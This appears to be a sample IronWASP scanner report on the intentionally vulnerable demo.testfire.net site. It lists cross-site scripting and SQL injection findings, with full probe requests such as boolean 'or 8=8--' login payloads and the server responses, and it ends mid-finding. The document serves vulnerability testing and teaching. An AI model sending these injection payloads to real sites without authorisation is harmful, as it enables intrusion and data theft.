IronWASP Security Analysis Report
Report based on the analysis performed by the open source web security software, IronWASP
Overview
NOTE:
This is not a doctored report but was generated after an actual scan of http://demo.testfire.net which is a test site hosted by the IBM AppScan team.
It also includes results from passive analysis of http://ironwasp.org and http://html5security.org websites.
The SQL Injection reported with medium confidence in this report is actually a False Positive. It has been included in the report to show the effectiveness of IronWASP's False Positive Detection support.
Reports generated by the user would not contain this section.
This report contains the list of security findings discovered by IronWASP. The current section of the report gives a brief overview of the number of different findings, the numbers are categorized by the hosts they were discovered on.
The index section contains the names of all the findings. The sections after that show details of every individual finding.

The table below shows the number of findings discovered in each host. The findings are seperated based on their type and severity.


Legend:

High     High Severity Vulnerability
Medium     Medium Severity Vulnerability
Low     Low Severity Vulnerability
Info     Information Findings
Test Leads     Things of interest for manual testing

The High, Medium and Low severity vulnerability numbers are also split based on the confidence with which IronWASP has reported them.

  0      High Confidence                0      Medium Confidence                0      Low Confidence             

High Medium Low Info Test leads Total Hosts
11
9
2
2
3
27
http://demo.testfire.net/
10
1
0
5
3
1
2
0
0
0
0
1
2
0
3
http://html5security.org/
0
0
0
0
0
0
1
0
0
0
0
1
2
0
3
http://ironwasp.org/
0
0
0
0
0
0
1
0
0
Index
The titles of all the findings are listed below categorized by the host they were discovered on. All items in the list below are links to relevant sections in the report.
http://demo.testfire.net/
http://html5security.org/
http://ironwasp.org/
http://demo.testfire.net/
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/search.aspx?txtSearch=uuuuu
Affected Parameter:txtSearch
Parameter Location:Query
Description:
Cross-site Scripting was identified in the txtSearch parameter of the Query section of the scanned request.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

GET http://demo.testfire.net/search.aspx?txtSearch=%3ch+xhx%3dyhy%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:18:48 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7589

[---- Snipped parts of HTTP body section for brevity ----]style="width: 99%;">

<h1>Search Results</h1>

<p>No results were found for the query:<br /><br />
<span id="_ctl0__ctl0_Content_Main_lblSearch"><h xhx=yhy></span></p>

</div>


</td>
</tr>
</table>


</div>

<div id="footer" style="width: 99%;">
<a id="_ctl0__ctl0_HyperLink5" href=[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/comment.aspx
Affected Parameter:name
Parameter Location:Body
Description:
Cross-site Scripting was identified in the name parameter of the Body section of the scanned request.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

POST http://demo.testfire.net/comment.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

cfile=comments.txt&name=%3ch+xhx%3dyhy%3e&email_addr=vvvvv&subject=vvvvv&submit=+Submit+&reset=+Clear+Form+

Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:22:28 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7545

[---- Snipped parts of HTTP body section for brevity ----]>
<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Thank You</h1>

<p>Thank you for your comments, <h xhx=yhy>. They will be reviewed by our Customer Service staff and
given the full attention that they deserve.</p>

</div>


</td>
</tr>
</tabl[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Affected Parameter:uid
Parameter Location:Body
Description:
Cross-site Scripting was identified in the uid parameter of the Body section of the scanned request.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request tries to inject an attribute with name 'olqpir' and value 'vtikr(1)' inside an HTML tag. The payload is " olqpir="vtikr(1)"

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=+%22+olqpir%3d%22vtikr(1)%22&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains an attribute with name 'olqpir' and value 'vtikr(1)' inside an HTML tag. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:24:56 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9152

[---- Snipped parts of HTTP body section for brevity ----]minput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid" value=" " olqpir="vtikr(1)"" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<[---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey><b"

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=a%22%3e%3ch+xex%3dyey%3e%3cb%22&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:25:09 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9149

[---- Snipped parts of HTTP body section for brevity ----]minput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid" value="a"><h xex=yey><b"" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<[---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey>

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=a%22%3e%3ch+xex%3dyey%3e&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:25:13 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9146

[---- Snipped parts of HTTP body section for brevity ----]minput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid" value="a"><h xex=yey>" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/notfound.aspx?aspxerrorpath=/admin.aspx
Affected Parameter:aspxerrorpath
Parameter Location:Query
Description:
Cross-site Scripting was identified in the aspxerrorpath parameter of the Query section of the scanned request.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

GET http://demo.testfire.net/notfound.aspx?aspxerrorpath=%3ch+xhx%3dyhy%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2013 15:35:28 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7669

[---- Snipped parts of HTTP body section for brevity ----]le="width: 99%;">

<h1>An Error Has Occurred</h1>

<p><span id="_ctl0__ctl0_Content_Main_error">Could not find the page you requested. <br><br><b><h xhx=yhy></b><br><br>Please check your spelling. If the spelling is correct and the page still does not exist contact the System Administrator.</span></p>

<[---- Snipped parts of HTTP body section for brevity ----]
Cross-site Scripting Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx?lang=international
Affected Parameter:lang
Parameter Location:Query
Description:
Cross-site Scripting was identified in the lang parameter of the Query section of the scanned request.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. The payload is <h xhx=yhy>

GET http://demo.testfire.net/bank/customize.aspx?lang=%3ch+xhx%3dyhy%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xhx' and attribute value 'yhy'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:36 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=<h xhx=yhy>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5887

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel"><h xhx=yhy></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey><b"

GET http://demo.testfire.net/bank/customize.aspx?lang=a%22%3e%3ch+xex%3dyey%3e%3cb%22 HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:37 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a"><h xex=yey><b"; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5907

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a"><h xex=yey><b"</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a'><h xex=yey><b'

GET http://demo.testfire.net/bank/customize.aspx?lang=a'%3e%3ch+xex%3dyey%3e%3cb' HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:38 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a'><h xex=yey><b'; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5903

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a'><h xex=yey><b'</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a><h xex=yey><b

GET http://demo.testfire.net/bank/customize.aspx?lang=a%3e%3ch+xex%3dyey%3e%3cb HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:38 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a><h xex=yey><b; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5899

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a><h xex=yey><b</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a"><h xex=yey>

GET http://demo.testfire.net/bank/customize.aspx?lang=a%22%3e%3ch+xex%3dyey%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:38 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a"><h xex=yey>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5897

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a"><h xex=yey></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a'><h xex=yey>

GET http://demo.testfire.net/bank/customize.aspx?lang=a'%3e%3ch+xex%3dyey%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:39 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a'><h xex=yey>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5895

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a'><h xex=yey></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Request sent by Scanner:

The payload in this request tries to inject an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. The payload is a><h xex=yey>

GET http://demo.testfire.net/bank/customize.aspx?lang=a%3e%3ch+xex%3dyey%3e HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains an HTML tag named 'h' with attribute name 'xex' and attribute value 'yey'. This was inserted by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:39 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=a><h xex=yey>; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5893

[---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">a><h xex=yey></span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
SQL Injection Detected
Type:Vulnerability
Severity:High
Confidence:Medium
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/default.aspx?content=inside_contact.htm
Affected Parameter:content
Parameter Location:Query
Description:
SQL Injection was identified in the content parameter of the Query section of the scanned request.

SQL Injection is an issue where it is possible execute SQL queries on the database being used on the server-side. For more details on this issue refer https://www.owasp.org/index.php/SQL_Injection

Reasons:
IronWASP has reported this issue because of the following reason:
Reason:
IronWASP sent three payloads to the application with SQL code snippets in them.
Payload A - i'||'nside_contact.htm
Payload B - i'+'nside_contact.htm
Payload C - i' 'nside_contact.htm
Payload A is trying to concatenate two strings as per the SQL syntax of Oracle database servers. Payload B is trying to concatenate the same two strings as per SQL syntax of MS SQL database servers. Payload C is trying to concatenate the same two strings as per the SQL syntax of MySQL database servers.
The response for Payload B and C were similar to each other and is different from the response received for Payloads A. This indicates that the application was actually trying to perform the string concatenation on the server-side and that the backend database in use is Oracle. Since incase of Oracle database server Payloads Oracle & B would have simply thrown an invalid SQL syntax exception their responses are similar. And Payload A would have executed without this error and so its response was different than the other two.
If the application was not actually performing the concatenation then all three payload should have received very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the three payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different strings and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request tries to concatenate two strings as per Oracle database's syntax. The payload is i'||'nside_contact.htm

GET http://demo.testfire.net/default.aspx?content=i'%7c%7c'nside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

This response is different from the responses recieved for the payloads that used MS SQL and MySQL databases' concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MS SQL database's syntax. The payload is i'+'nside_contact.htm

GET http://demo.testfire.net/default.aspx?content=i'%2b'nside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

This response is different from the response recieved for the payloads that used Oracle database's concatenation syntax but similar to the response for the payload that used MySQL database's concatenation syntax

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MySQL database's syntax. The payload is i' 'nside_contact.htm

GET http://demo.testfire.net/default.aspx?content=i'+'nside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

This response is different from the response recieved for the payloads that used Oracle database's concatenation syntax but similar to the response for the payload that used MS SQL database's concatenation syntax

SQL Injection Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Affected Parameter:uid
Parameter Location:Body
Description:
SQL Injection was identified in the uid parameter of the Body section of the scanned request.

SQL Injection is an issue where it is possible execute SQL queries on the database being used on the server-side. For more details on this issue refer https://www.owasp.org/index.php/SQL_Injection

Reasons:
IronWASP has reported this issue because of the following reasons:
Reason 1:
IronWASP sent ¿'"( as payload to the application and the response that came back had the error message Syntax error in string in query expression. This error message is usually associated with SQL query related errors and it appears that the payload was able to break out of the data context and cause this error. This is an indication of SQL Injection.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message actually is because of some SQL related exception on the server-side. Try sending the same request without the payload and check if the error goes away.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger database error messages. The payload is ¿'"(.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=¿'"(&passw=qqqq&btnSubmit=Login

Response from the Server:

This response contains database error messages.

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5465

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="err" style="width: 99%;">

<h1>An Error Has Occurred</h1>

<h2>Summary:</h2>

<p><b><span id="_ctl0_Content_lblSummary">Syntax error in string in query expression 'username = '�'&quot;(' AND password = 'qqqq''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleD[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]uot;(' AND password = 'qqqq''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbException: Syntax error in string in query expression 'username = '�'&quot;(' AND password = 'qqqq''.
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.[---- Snipped parts of HTTP body section for brevity ----]
Reason 2:
IronWASP sent three payloads to the application with SQL code snippets in them.
Payload A - q'||'qqq
Payload B - q'+'qqq
Payload C - q' 'qqq
Payload A is trying to concatenate two strings as per the SQL syntax of Oracle database servers. Payload B is trying to concatenate the same two strings as per SQL syntax of MS SQL database servers. Payload C is trying to concatenate the same two strings as per the SQL syntax of MySQL database servers.
The response for Payload A and C were similar to each other and is different from the response received for Payloads B. This indicates that the application was actually trying to perform the string concatenation on the server-side and that the backend database in use is MS SQL. Since incase of MS SQL database server Payloads MS SQL & A would have simply thrown an invalid SQL syntax exception their responses are similar. And Payload B would have executed without this error and so its response was different than the other two.
If the application was not actually performing the concatenation then all three payload should have received very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the three payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different strings and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request tries to concatenate two strings as per Oracle database's syntax. The payload is q'||'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=q'%7c%7c'qqq&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response recieved for the payloads that used MS SQL database's concatenation syntax but similar to the response for the payload that used MySQL database's concatenation syntax

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MS SQL database's syntax. The payload is q'+'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=q'%2b'qqq&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the responses recieved for the payloads that used MySQL and Oracle databases' concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MySQL database's syntax. The payload is q' 'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=q'+'qqq&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response recieved for the payloads that used MS SQL database's concatenation syntax but similar to the response for the payload that used Oracle database's concatenation syntax

Reason 3:
IronWASP sent four payloads to the application with SQL code snippets in them.
Payload A - qqqqxxx' or 8=8--
Payload B - qqqqxxx' or 7=5--
Payload C - qqqqxxx' or 7=7--
Payload D - qqqqxxx' or 5=8--
Payload A and C have a boolean condition after the OR keyword that will evaluate to true. The boolean condition in Payload B and D would evaluate to false.
The response for Payload A and C were similar to each other and were different from the response received for Payload B and D. This indicates that the application was actually evaluating the boolean condition in the payloads. So since Payload A and C both has a true boolean condition their responses are similar, C and D had a false boolean condition.
If the application was not actually evaluating the boolean condition then all four payload should have returned very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the four payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with values in the boolean expression and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 8=8-- which evaluates to true. The payload is qqqqxxx' or 8=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+8%3d8--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean true condition based payload. This response is equal to the response of the second boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=5-- which evaluates to false. The payload is qqqqxxx' or 7=5--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+7%3d5--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean false condition based payload. This response is equal to the response of the second boolean false condition payload and different from the responses of the boolean true condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=7-- which evaluates to true. The payload is qqqqxxx' or 7=7--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+7%3d7--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean true condition based payload. This response is equal to the response of the first boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 5=8-- which evaluates to false. The payload is qqqqxxx' or 5=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+5%3d8--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean false condition based payload. This response is equal to the response of the first boolean false condition payload and different from the responses of the boolean true condition payloads.

SQL Injection Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Affected Parameter:passw
Parameter Location:Body
Description:
SQL Injection was identified in the passw parameter of the Body section of the scanned request.

SQL Injection is an issue where it is possible execute SQL queries on the database being used on the server-side. For more details on this issue refer https://www.owasp.org/index.php/SQL_Injection

Reasons:
IronWASP has reported this issue because of the following reasons:
Reason 1:
